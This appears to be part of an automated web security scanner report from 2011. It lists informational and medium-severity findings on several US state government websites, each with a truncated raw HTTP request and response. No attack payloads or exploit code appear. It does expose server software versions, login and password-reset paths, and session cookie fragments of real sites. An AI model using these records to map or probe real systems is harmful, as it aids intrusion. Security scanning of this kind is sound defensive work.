| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:42 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2ED0E93072C91 Last-Modified: Tue, 25 Jan 2011 14:40:55 GMT ETag: "1780fa-477-b430ebc0" Accept-Ranges: bytes Content-Length: 1143 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.... ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:43 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2F69EA9072C91 Last-Modified: Tue, 25 Jan 2011 16:52:24 GMT ETag: "5c004-646-8a698200" Accept-Ranges: bytes Content-Length: 1606 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......Exif..II*.......1.. ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:44 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=300926FA72C91 Last-Modified: Tue, 25 Jan 2011 16:44:12 GMT ETag: "1780fc-64e-6d162f00" Accept-Ranges: bytes Content-Length: 1614 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......Exif..II*.......1.. ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:42 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2ED168B072C91 Last-Modified: Thu, 10 Mar 2011 17:28:09 GMT ETag: "1780fe-279-2b481c40" Accept-Ranges: bytes Content-Length: 633 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..K................ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:44 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=3017DBFA72C91 Last-Modified: Thu, 10 Mar 2011 17:28:01 GMT ETag: "1780ff-5c5-2ace0a40" Accept-Ranges: bytes Content-Length: 1477 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..K................ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:44 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=302A2BC072C91 Last-Modified: Wed, 26 Jan 2011 20:14:05 GMT ETag: "178101-13b-79877d40" Accept-Ranges: bytes Content-Length: 315 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a(.................. ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail |
| GET /content/media/retail Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:44 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=301B239672C91 Last-Modified: Tue, 25 Jan 2011 16:29:01 GMT ETag: "47001d-24d-36c96d40" Accept-Ranges: bytes Content-Length: 589 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a....|.b_d......ebg....... ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /content/media/retail/js |
| GET /content/media/retail/js Host: www.nrsservicecenter.com Connection: keep-alive Referer: https://www.nrsservi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:28:42 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=2ED0072C72C91 Last-Modified: Thu, 07 Oct 2010 15:11:19 GMT ETag: "1f8dfc-522e-4e5db3c0" Accept-Ranges: bytes Content-Length: 21038 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* WebTrends SmartSource Data Collector Tag Version: 8.6.2 Tag Builder Version: 3.0 Created: 4/1/2009 5:35:05 PM Updated for double tagging State of Ohio Ohio457.org */ function WebT ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.nrsservicecenter.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=2B79DD6E72C91 |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 01:38:26 GMT Server: IBM_HTTP_Server/6.1.0.27 Set-Cookie: TLTHID=8B164DF672CA1 Content-Length: 332 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> <hr /> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.ri.gov |
| Path: | /Licensing/renewal |
| GET /Licensing/renewal Host: www.ri.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=53040939 |
| HTTP/1.1 302 Found Date: Sat, 30 Apr 2011 12:40:06 GMT Server: www Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 30 Apr 2011 12:40:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 27c333941c8c80ef374f Location: /Licensing/ Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html; charset=iso-8859-1 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /Common/HelpWindow.aspx |
| GET /Common/HelpWindow.aspx HTTP/1.1 Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:07 GMT Connection: close Set-Cookie: TS958e6e=dfdcf9946f9 Vary: Accept-Encoding Content-Length: 32551 <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> SCBOS - Welcome to the South Carolina Business One Stop </title> <meta http-equiv="Con ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /Eng/Secured/Security |
| GET /Eng/Secured/Security Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:11 GMT Connection: close Content-Length: 35565 Set-Cookie: TS958e6e=03bbad50353 Vary: Accept-Encoding <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> SCBOS Forgot Password - Enter User Name </title> <meta http-equiv="Content-Type" con ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /Eng/Secured/Security |
| GET /Eng/Secured/Security Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:14 GMT Connection: close Content-Length: 35777 Set-Cookie: TS958e6e=aed2e7cc2d3 Vary: Accept-Encoding <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> SCBOS - Forgot User Name </title> <meta http-equiv="Content-Type" content="text/html ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /Login.aspx |
| GET /Login.aspx HTTP/1.1 Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:13 GMT Connection: close Content-Length: 38680 Set-Cookie: TS958e6e=aed2e7cc2d3 Vary: Accept-Encoding <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> Login </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /SCBOS.Core.DynamicF |
| GET /SCBOS.Core.DynamicF Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:15 GMT Connection: close Content-Length: 0 Set-Cookie: TS958e6e=ea57241c9d8 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /SCBOS.Core.Framework |
| GET /SCBOS.Core.Framework Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: private Expires: Wed, 04 May 2011 12:40:18 GMT Last-Modified: Sat, 30 Apr 2011 12:40:18 GMT Accept-Ranges: bytes X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:18 GMT Connection: close Content-Length: 0 Set-Cookie: TS958e6e=003288ad0d5 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /SCBOS.Core.Framework.Web |
| GET /SCBOS.Core.Framework.Web Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:17 GMT Connection: close Content-Length: 0 Set-Cookie: TS958e6e=e2083b6514d |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /SCBOS.Core.Framework.Web |
| GET /SCBOS.Core.Framework.Web Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:19 GMT Connection: close Content-Length: 0 Set-Cookie: TS958e6e=eacd5b74d8d |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /WebResource.axd |
| GET /WebResource.axd HTTP/1.1 Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:20 GMT Connection: close Set-Cookie: TS958e6e=274ee5e0c50 Vary: Accept-Encoding Content-Length: 32144 <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> SCBOS - Welcome to the South Carolina Business One Stop </title> <meta http-equiv="Con ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /eng/Secured/Security |
| GET /eng/Secured/Security Host: www.scsignon.sc.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 12:40:08 GMT Connection: close Content-Length: 35575 Set-Cookie: TS958e6e=226dae4efe9 Vary: Accept-Encoding <!doctype html public "-//w3c//dtd html 4.01 transitional//en"> <html lang="en"> <head> <title> SCBOS Register User - Create User Name </title> <meta http-equiv="Content-Type" conten ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://apps.tn.gov |
| Path: | /bizreg/tax.jsp |
| GET /bizreg/tax.jsp Host: apps.tn.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=AEF014064 |
| HTTP/1.0 302 Found Location: https://apps.tn.gov Server: BigIP Connection: Keep-Alive Content-Length: 0 |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://apps.tn.gov |
| Path: | /bizreg/tax.jsp |
| GET /bizreg/tax.jsp Host: apps.tn.gov Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=AEF014064 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:58:58 GMT Server: Apache-Coyote/1.1 X-Powered-By: Content-Type: text/html;charset=ISO Content-Length: 4949 Keep-Alive: timeout=30, max=5500 Connection: Keep-Alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"><!-- #BeginTemplate "/Templates/bizreg.dwt" --><!-- DW6 --> <head> <!-- #BeginEditable "doctitle" --> <title> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC002.asp |
| GET /PGM/ASP/SC002.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:37:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 18711 Content-Type: text/html Expires: Sat, 30 Apr 2011 00:37:42 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC002.asp |
| GET /PGM/ASP/SC002.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:37:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 18711 Content-Type: text/html Expires: Sat, 30 Apr 2011 00:37:42 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... <td> <a Href='SC031.asp?hdn ...[SNIP]... </SPAN> <a Href='SC024.asp?hdn ...[SNIP]... </SPAN> <a Href='SC024.asp?hdn ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC020.asp |
| GET /PGM/ASP/SC020.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 302 Object moved Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:37:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: SC002.asp?hdn_SessionId Content-Length: 194 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="SC002.asp?hdn |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://az.gov |
| Path: | /app/calendar/Calend |
| GET /app/calendar/Calend Host: az.gov Proxy-Connection: keep-alive Referer: http://az.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Connection: Keep-Alive Proxy-Connection: Keep-Alive Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE) Date: Sat, 30 Apr 2011 11:15:03 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat X-Powered-By: JSF/1.2 Content-Type: application/xhtml+xml Content-Length: 6032 Set-Cookie: JSESSIONID=D59995EC7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <head> <link rel='stylesheet' type='text/css' href='/app/calendar/a4j_3 ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://az.gov |
| Path: | /app/calendar/a4j_3_1_3 |
| GET /app/calendar/a4j_3_1_3 Host: az.gov Proxy-Connection: keep-alive Referer: http://az.gov/app User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=70586944 |
| HTTP/1.1 200 OK Age: 47 Proxy-Connection: Keep-Alive Connection: Keep-Alive Content-Length: 6118 Content-Type: text/css;charset=ISO-8859 Expires: Sun, 01 May 2011 11:14:28 GMT Last-Modified: Thu, 09 Dec 2010 22:11:40 GMT X-Powered-By: JSF/1.2 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat Server: Apache-Coyote/1.1 Date: Sat, 30 Apr 2011 11:14:28 GMT Cache-control: max-age=86400 Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE) .rich-calendar-exterior ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://bh.contextweb.com |
| Path: | /bh/set.aspx |
| GET /bh/set.aspx?action=add Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.kodakgallery User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pb_rtb_ev=1:535495 |
| HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web84 Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Tue, 24-Apr-2012 15:08:25 GMT; Path=/ Set-Cookie: cwbh1=541%3B05%2F24 Content-Type: image/gif Date: Sat, 30 Apr 2011 15:08:24 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://de.gov |
| Path: | / |
| GET / HTTP/1.1 Host: de.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:50:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 148548 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en-us"> <head> <meta name="verify-v1" content="thP3VfXQ653 ...[SNIP]... <strong><a href="http://server.iad ...[SNIP]... <strong><a href="http://server.iad ...[SNIP]... <strong><a href="http://server.iad ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://de.gov |
| Path: | /profile.php |
| GET /profile.php HTTP/1.1 Host: de.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fcspersistslider1=3; |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 12:19:26 GMT Server: Apache/2.2.3 (Red Hat) Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 25272 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en-us"> <head> <!-- Global meta tags, external stylesheets and scripts --> <meta ...[SNIP]... <!-- BEGIN LivePerson Link Code -->-<a href="http://server.iad Live Chat</a> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://ga.gov |
| Path: | /00/home/0,2061,4802,00 |
| GET /00/home/0,2061,4802,00 Host: ga.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=E163D8F13 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:07:16 GMT Server: Apache/1.3.29 (Unix) Content-Type: text/html Content-Length: 27652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <li><a href="https://services ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://ga.gov |
| Path: | /00/home/0,2061,4802,00 |
